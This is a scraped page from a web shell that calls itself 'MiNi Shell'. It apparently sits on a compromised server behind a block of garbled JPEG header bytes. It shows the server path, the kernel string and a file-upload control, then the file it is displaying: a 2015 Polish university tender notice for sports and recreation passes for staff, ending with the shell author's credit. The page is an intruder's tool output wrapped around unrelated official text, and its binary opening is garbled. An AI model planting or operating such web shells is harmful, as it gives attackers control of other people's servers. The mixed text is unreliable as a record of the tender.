JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150818/122961-N-2015.html

<p class="kh_header"><b>Olsztyn: Dostawa karnetów uprawniających do wstępu i udziału w zajęciach w obiektach partnerskich dla osób uprawnionych zgodnie z regulaminem zakładowego funduszu świadczeń socjalnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie dla osób im towarzyszących</b><br>
<b>Numer ogłoszenia: 122961 - 2015; data zamieszczenia: 18.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa karnetów uprawniających do wstępu i udziału w zajęciach w obiektach partnerskich dla osób uprawnionych zgodnie z regulaminem zakładowego funduszu świadczeń socjalnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie dla osób im towarzyszących.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot dostawy: 
1.	Przedmiotem niniejszego postępowania o zamówienie publiczne jest dostawa karnetów uprawniających do wstępu i udziału w zajęciach w obiektach partnerskich dla osób uprawnionych zgodnie z regulaminem zakładowego funduszu świadczeń socjalnych Uniwersytetu Warmińsko-Mazurskiego w Olsztynie dla osób im towarzyszących.
II. Zakres przedmiotowy usługi: 
1.	Zamawiający wymaga zaoferowania karnetów uprawniających do wstępu i udziału w zajęciach w co najmniej 30 obiektach partnerskich na terenie miasta Olsztyn w tym obiekty sportowe (minimum 5), baseny o długości 25 m każdy (minimum 2) oraz szkoły tańca (minimum 2)  na terenie miasta Olsztyn.
2.	Wstęp do obiektów partnerskich przywołanych przez Wykonawcę, celem spełnienia kryterium wyboru i oceny ofert w przedmiotowym postępowaniu, nie może być dodatkowo płatny za okazaniem karnetu.
3.	Zamawiający deklaruje chęć nabycia 1500 karnetów w danym okresie rozliczeniowym, uprawniających do wstępu do obiektów rekreacyjnych, sportowych lub rehabilitacyjnych o zróżnicowanym charakterze i jednocześnie informuje, iż zadeklarowana ilość jest wynikiem zgłoszonego zapotrzebowania oraz ich wykorzystaniem w ramach poprzednio zawartych umów.
4.	Z uwagi na brak możliwości przewidzenia zakupu konkretnych ilości Zamawiający zastrzega sobie prawo do składania zamówień na mniejszą niż specyfikowana ilość karnetów będących przedmiotem niniejszego postępowania.
5.	 Zamawiający wymaga aby Wykonawca zaoferował karnety uprawniające do korzystania z różnych form rekreacji takich jak np.: basen, aerobic, aqua aerobic, body bike, gimnastyka, joga, nauka tańca, nordick walking, pilates, sauna, ścianka wspinaczkowa, siłownia, squash, tai-chi, indor cycling, sztuki walki itp.
6.	 Karnety muszą umożliwiać wstęp bez ograniczeń do każdego obiektu partnerskiego. 
7.	Bez ograniczeń w rozumieniu Zamawiającego oznacza wstęp do jednego obiektu partnerskiego w ciągu 1 dnia na nielimitowaną ilość godzin bez względu na rodzaj wykonywanej aktywności fizycznej, chyba, że grafik lub regulamin wewnętrzny obiektu partnerskiego stanowi inaczej. Wyjątek także mogą stanowić wejścia na basen, które nie mogą być krótsze niż 45 minut. 
8.	 Zamawiający wymaga również, aby zaoferowany karnet umożliwiał wstęp do różnych obiektów partnerskich w ciągu 1 dnia bez konieczności tzw. przerwy między wejściami.
9.	Do kryterium wyboru i oceny ofert za obiekt partnerski lub sportowy nie będzie uznawana wynajmowana sala celem przeprowadzenia cyklicznych zajęć np. fitness. 
10.	Zamawiający wymaga dołączenia do oferty wykazu sporządzonego wg Załącznika nr 7 do SIWZ, wszystkich obiektów partnerskich z których usług można korzystać za okazaniem karnetu. Lista musi zawierać wszystkie obiekty partnerskie na terenie miasta Olsztyn i województwa warmińsko-mazurskiego. 
11.	Zamawiający dopuszcza możliwość skorzystania z usług dodatkowo płatnych za okazaniem karnetu. 
12.	Zamawiający przewiduje dofinansowanie z Zakładowego Funduszu Świadczeń Socjalnych do usług sportowo rekreacyjnych na rzecz osób uprawnionych  tj. (Pracownik, były pracownik, współmałżonek i dzieci) w wysokości 50 %.
13.	Każda osoba uprawniona może zgłosić nie więcej niż 2 osoby towarzyszce, mogące nabywać karnety łącznie z osobą uprawnioną. 
III. Sposób i forma realizacji przedmiotu zamówienia:
1.	 Wykonawca jest zobowiązany do powołania się na dysponowanie obiektami partnerskimi, z którymi zawarta jest ważna umowa o świadczenie usług. 
2.	 W okresie trwania umowy, Wykonawca ma obowiązek zapewnić taką ilość obiektów partnerskich, na jaką zdeklarował się w złożonej ofercie z uwagi na fakt, iż ilość obiektów stanowi jedno z kryterium wyboru i oceny ofert.
3.	W przypadku rozwiązania umowy z danym obiektem partnerskim, Wykonawca jest zobowiązany w terminie 3 dni od dnia powzięcia informacji o wypowiedzeniu, do przedstawienia danych nowego obiektu partnerskiego tak aby liczba obiektów partnerskich była stała w trakcie realizacji umowy. W takim przypadku Zamawiający dokona aneksowania zawartej umowy.
4.	 Z uwagi na brak możliwości kontroli i weryfikacji poszczególnych osób uprawnionych i osób im towarzyszących po nieopłaceniu okresu rozliczeniowego, Zamawiający wymaga zaoferowania kart chipowych. 
5.	Zamawiający dopuszcza możliwość wstępu do obiektów partnerskich za okazaniem karnetu i dowodu tożsamości. 
6.	Zamawiający zobowiązany jest do dostarczenia imiennej listy osób uprawnionych i osób im towarzyszących w terminie na 5 dni przed rozpoczęciem każdego okresu rozliczeniowego.
IV. Termin realizacji przedmiotu umowy:
1.	Termin wykonania zamówienia: od dnia 15.09.2015 r. do dnia 14.01.2016 r. chyba, że wyczerpaniu ulegnie kwota przeznaczona na sfinansowanie zamówienia.
2.	Sposób realizacji zamówienia: Wykonawca zobowiązany jest do dostarczenia karnetów w terminie do dnia 14 - go każdego miesiąca.
V. Sposób i warunki płatności:
1.	Zamawiający zapłaci cenę należną zgodnie z zawartą umową, przelewem na konto wskazane przez Wykonawcę, w ciągu 30 dni od daty otrzymania prawidłowo wystawionej faktury..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku wskazanego w art. 22 ust. 1 pkt. 2 Ustawy Prawo zamówień publicznych tj. posiadanie wiedzy i doświadczenia, Wykonawca wykaże posiadanie wiedzy i doświadczenia polegającej na wykonaniu lub wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie spośród dostaw głównych, dostaw potwierdzających zdolność Wykonawcy do należytego wykonania zamówienia oraz w odniesieniu do jego rzetelności, rozumianej jako solidne i sumienne wywiązanie się z uprzednio zaciągniętych zobowiązań w ramach profesjonalnej realizacji zleconych mu zadań. Za zakres dostaw potwierdzający zdolność Wykonawcy do należytego wykonania zamówienia Zamawiający uważa: minimum 3 dostawy karnetów tzw. sportowych uprawniających do wstępu i udziału w zajęciach w obiektach partnerskich dla osób uprawnionych o wartości brutto nie mniejszej niż 150.000,00 złotych brutto, każda z nich.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego; 
2. Wypełniony i podpisany formularz Opis przedmiotu zamówienia sporządzony zgodnie z Załącznikiem nr 1 do SIWZ;
3. Wypełniony i podpisany formularz oferty sporządzony zgodnie z Załącznikiem nr 2 do SIWZ; 
4. Oświadczenie z art. 22 sporządzone zgodnie z Załącznikiem nr 3 do SIWZ;
5. Oświadczenie o braku podstaw do wykluczenia z postępowania sporządzone zgodnie z Załącznikiem nr 4 do SIWZ;
6. Oświadczenie z art. 24 ust. 2 pkt. 5 Ustawy Pzp sporządzone zgodnie z Załącznikiem nr 5 do SIWZ; 
7.  Wypełniony i podpisany wykaz wszystkich obiektów partnerskich sporządzony zgodnie z Załącznikiem nr 7 do SIWZ; 
7.  Wypełniony i podpisany wykaz dostaw sporządzony zgodnie z Załącznikiem nr 8 do SIWZ; 
8. Wszystkie dokumenty zamieszczone zostały na stronie Zamawiającego tj. http://www.uwm.edu.pl/zamowienia/przetargi_nowe/lista-przetargow.html</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Obiekty sportowe - 30</li>
<li>3 - Szkoły tańca - 10</li>
<li>4 - Basen - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uwm.edu.pl/zamowienia/przetargi_nowe/lista-przetargow.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 305, 10-719 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2015 godzina 10:00, miejsce: Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 311, 10-719 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wstęp do obiektów partnerskich przywołanych przez Wykonawcę, celem spełnienia kryterium wyboru i oceny ofert w przedmiotowym postępowaniu, nie może być dodatkowo płatny za okazaniem karnetu.

2. Kryteria wyboru i oceny ofert posłużą Zamawiającemu jedynie do dokonania wyboru najkorzystniejszej oferty. W trakcie realizacji umowy Zamawiający zastrzega sobie prawo do korzystania ze wszystkich obiektów partnerskich znajdujących się w ofercie Wykonawcy.
3. Zamawiający wymaga zaoferowania karnetów uprawniających do wstępu i udziału w zajęciach w co najmniej 30 obiektach partnerskich na terenie miasta Olsztyn w tym obiekty sportowe (minimum 5), baseny o długości 25 m każdy (minimum 2) oraz szkoły tańca (minimum 2)  na terenie miasta Olsztyn.
4.	Termin wykonania zamówienia: od dnia 15.09.2015 r. od dnia do 14.01.2016 r. chyba, że wyczerpaniu ulegnie kwota przeznaczona na sfinansowanie zamówienia.
5.	Sposób realizacji zamówienia: Wykonawca zobowiązany jest do dostarczenia karnetów w terminie do dnia 14 - go każdego miesiąca..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com